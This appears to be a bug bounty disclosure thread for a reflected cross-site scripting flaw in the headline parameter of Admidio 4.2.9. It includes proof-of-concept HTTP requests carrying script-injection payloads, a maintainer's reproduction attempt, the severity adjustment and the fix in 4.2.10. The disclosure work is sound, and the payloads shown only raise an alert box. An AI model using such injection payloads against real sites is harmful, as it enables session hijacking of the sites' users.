Cross site scripting in Admidio 4.2.9 via headline parameter in admidio/admidio


Reported on

Jun 18th 2023


Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.

Proof of Concept

URL: http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php
Vulnerable Parameter: headline

# Details:
URL encoded GET input headline was set to Announcements"><script>alert(9370)</script>

The input is reflected inside a tag parameter between double quotes.

HTTP Request:

GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script> HTTP/1.1
Referer: http://localhost/admidio-4.2.9/
Cookie: ADMIDIO_admidio_adm_SESSION_ID=1vv2p802t9j8fiek592n3p6uqj; ADMIDIO_admidio_adm_cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Host: localhost
Connection: Keep-alive

HTTP Response:

Redacted [*]

<p class="lead">The URL in the field <strong>http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script></strong> contains invalid characters.<br /><br />Only alphabetic characters, umlauts, numbers 0-9 and special characters .-+_:/#?= are allowed.</p>


How to fix this vulnerability:

Apply context-dependent encoding and/or validation to user input rendered on a page


Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user.

We are processing your report and will contact the admidio team within 24 hours. 6 months ago
We have contacted a member of the admidio team and are waiting to hear back 6 months ago
5 months ago


Hi, I'm not able to reproduce that behavior. If I enter the url adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script> than I got a headline e.g. Announcements">alert(9370) - but nothing else. No alert is shown or the response that you mentioned.

5 months ago


Hi Mark,

Good day!

Upon checking it seems that this is only a self xss which only works when the response is from burp suite please see the screenshot below:

Screenshot 1:

alt text

Screenshot 2:

alt text

Screenshot 3:

alt text

HTTP Request Used:

GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0">xxxx<script>alert(1)</script>xxxx&headline=Announcements">xxxx<script>alert(9370)</script> HTTP/1.1
Host: localhost
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: http://localhost/admidio-4.2.9/adm_program/overview.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_SESSION_ID=3b0nln1d94pi59vd8rhr30v9sq
Connection: close
Markus Faßbender modified the Severity from High (7.3) to Medium (5.6) 5 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Markus Faßbender validated this vulnerability 5 months ago

I set the complexity to high because for me it's not that easy to get to this XSS only via link.

Scream0h0lics has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Markus Faßbender marked this as fixed in 4.2.10 with commit 4aac1e 5 months ago
Markus Faßbender has been awarded the fix bounty
This vulnerability will not receive a CVE
This vulnerability is scheduled to go public on Jul 16th 2023
Markus Faßbender published this vulnerability 5 months ago
to join this conversation